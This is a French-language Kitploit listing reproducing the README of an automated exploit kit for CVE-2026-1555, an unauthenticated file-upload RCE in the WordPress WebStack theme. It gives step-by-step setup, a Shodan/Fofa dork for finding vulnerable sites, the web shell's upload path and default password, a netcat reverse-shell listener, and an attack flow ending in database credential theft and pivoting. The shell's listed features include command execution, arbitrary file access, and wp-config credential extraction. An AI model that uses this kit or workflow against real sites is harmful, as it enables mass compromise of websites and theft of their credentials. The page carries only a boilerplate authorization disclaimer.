Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
WG-CVE-2026-1555-Linux — Kit automatisé d'exploitation pour CVE-2026-1555, une RCE critique par téléchargement de fichier non authentifié dans le thème WordPress WebStack. Comprend une interface graphique PyQt5, une découverte de cibles basée sur des dorks et un webshell PHP multifonction pour la post-exploitation. | Kitploit
Outils/GitHubGitHub/willygailo/wg-cve-2026-1555-linux
ReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleApprentissage et ÉducationRed TeamingDéveloppement de Charges Utiles

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
GitHubwillygailo/wg-cve-2026-1555-linux

WG-CVE-2026-1555-Linux

Voir le dépôt
3il y a 3 moisPas encore vérifié

À propos

Kit automatisé d'exploitation pour CVE-2026-1555, une RCE critique par téléchargement de fichier non authentifié dans le thème WordPress WebStack. Comprend une interface graphique PyQt5, une découverte de cibles basée sur des dorks et un webshell PHP multifonction pour la post-exploitation.

Partager
root@kitploit:~
 ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗  ██████╗      
██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗██╔════╝      
██║     ██║   ██║█████╗       █████╔╝██║██╔██║ █████╔╝███████╗      
██║     ╚██╗ ██╔╝██╔══╝      ██╔═══╝ ████╔╝██║██╔═══╝ ██╔═══██╗     
╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗╚██████╔╝     
 ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝ ╚═════╝      

CVE-2026-1555 — Thème WordPress WebStack RCE

Thème WordPress WebStack — Exécution de code à distance non authentifiée

Python PyQt5 Platform PHP Status

Pour tests de pénétration éducatifs et autorisés uniquement.


📌 Aperçu

CVE-2026-1555 est une vulnérabilité critique affectant le thème WordPress WebStack qui permet à des attaquants non authentifiés d'effectuer un téléchargement arbitraire de fichiers menant à une exécution de code à distance (RCE) sur le serveur cible.

Cet outil (FriendsExploit) automatise la découverte et l'exploitation de cibles vulnérables via une interface graphique PyQt5 propre avec un scan dork intégré.

root@kitploit:~
Surface cible → Sites WordPress exécutant le thème WebStack
Type de vulnérabilité → Téléchargement arbitraire de fichiers non authentifié → RCE
Score CVSS → 9.8 (Critique)
Authentification requise → Aucune
Charge utile → ms.php (Shell web PHP multi-fonctions)

📁 Structure du projet

root@kitploit:~
CVE-2026-1555-Linux/
│
├── CVE-2026-1555.py          # Outil d'exploitation principal (interface PyQt5)
├── ms.php                    # Charge utile de shell web PHP
├── Dork.txt                  # Dork Fofa/Shodan pour la découverte de cibles
├── requirements.txt          # Dépendances Python
└── README.md                 # Vous êtes ici

⚙️ Prérequis

PrérequisVersion
Python3.8+
PyQt5≥ 5.15.0
requests≥ 2.31.0
urllib3≥ 2.0.0
OS

🚀 Configuration et installation

Étape 1 — Cloner le dépôt

root@kitploit:~
git clone https://github.com/YOUR_USERNAME/CVE-2026-1555-Linux.git
cd CVE-2026-1555-Linux

Étape 2 — Créer un environnement virtuel (recommandé)

root@kitploit:~
python3 -m venv venv
source venv/bin/activate

Étape 3 — Installer les dépendances

root@kitploit:~
pip install -r requirements.txt

Utilisateurs Kali / Debian — si PyQt5 échoue via pip, installez-le d'abord au niveau système :

root@kitploit:~
sudo apt install python3-pyqt5 -y

Étape 4 — Lancer l'outil

root@kitploit:~
python3 CVE-2026-1555.py

L'interface graphique se lance. Chargez les cibles manuellement ou utilisez le scanner dork intégré.


🐚 Shell web — ms.php

Après une exploitation réussie, l'outil télécharge ms.php sur la cible.

Accès

root@kitploit:~
https://target.com/wp-content/themes/WebStack/ms.php

Mot de passe par défaut : fr13nds2026

Fonctionnalités du shell web

Configuration d'un reverse shell

Sur votre machine, démarrez un écouteur :

root@kitploit:~
nc -lvnp 4444

Dans l'onglet REVSHELL du shell web → entrez votre IP et votre port → cliquez sur FIRE.


🔎 Découverte de cibles (Dork)

Dork Fofa / Shodan (depuis Dork.txt) :

root@kitploit:~
body="wp-content/themes/WebStack"

Collez dans Fofa ou Shodan pour énumérer les cibles vulnérables.


🔬 Détails de la vulnérabilité

Flux d'attaque

root@kitploit:~
[1] Découvrir la cible via un scan dork
        ↓
[2] Confirmer l'installation du thème WebStack
        ↓
[3] Déclencher le point de terminaison de téléchargement vulnérable (aucune authentification requise)
        ↓
[4] Télécharger la charge utile ms.php vers la racine web
        ↓
[5] Accéder au shell web → obtenir RCE
        ↓
[6] Escalader : extraire les identifiants DB, pivoter, reverse shell

🛠️ Dépannage

Erreur d'affichage PyQt5 sur un serveur sans tête :

root@kitploit:~
export DISPLAY=:0
# ou utiliser Xvfb
sudo apt install xvfb -y
Xvfb :0 -screen 0 1024x768x24 &
export DISPLAY=:0
python3 CVE-2026-1555.py

L'installation pip échoue pour PyQt5 :

root@kitploit:~
sudo apt install python3-pyqt5 python3-pyqt5.qtwebengine -y

Permission refusée lors de l'exécution du script :

root@kitploit:~
chmod +x CVE-2026-1555.py
python3 CVE-2026-1555.py

Erreurs SSL requests/urllib3 :

root@kitploit:~
pip install --upgrade requests urllib3 certifi

📋 Exécution rapide (en une ligne)

root@kitploit:~
git clone https://github.com/YOUR_USERNAME/CVE-2026-1555-Linux.git && \
cd CVE-2026-1555-Linux && \
python3 -m venv venv && source venv/bin/activate && \
pip install -r requirements.txt -q && \
python3 CVE-2026-1555.py

⚠️ Avertissement

root@kitploit:~
Cet outil est destiné uniquement à la recherche en sécurité autorisée et aux tests 
de pénétration. Les auteurs ne sont pas responsables de toute utilisation abusive ou 
des dommages causés par ce programme. Utilisez-le uniquement contre des systèmes 
dont vous êtes propriétaire ou pour lesquels vous avez une autorisation écrite explicite 
de test. L'utilisation non autorisée est illégale.

FriendsExploit • CVE-2026-1555 • Édition Linux

Conçu pour les chercheurs. Utilisez-le de manière responsable.

Télécharger l’outil
Linux (Debian/Ubuntu/Kali recommandé)
ModuleDescription
🖥️ SYSINFOVersion PHP, OS, utilisateur actuel, statut du mode sécurisé, variables serveur
💻 TERMINALExécution complète de commandes avec sortie en direct — prend en charge 6 méthodes d'exécution
📂 FILESLire / Écrire / Modifier / Supprimer / Télécharger tout fichier sur le serveur
📤 UPLOADTélécharger des fichiers vers n'importe quel chemin ou récupérer des fichiers distants via wget/curl
🔄 REVSHELLLancement de reverse shell en un clic + shells bash/python3/perl/nc/php préconstruits
🗄️ DB SCANDétection automatique de wp-config.php, extraction des identifiants de base de données, exécuteur MySQL manuel
ChampInformations
Identifiant CVECVE-2026-1555
Logiciel concernéThème WordPress WebStack
Type de vulnérabilitéTéléchargement arbitraire de fichiers non authentifié → RCE
Vecteur d'attaqueRéseau
AuthentificationNon requise
Score CVSS v39.8 Critique
Versions concernéesToutes les versions antérieures au correctif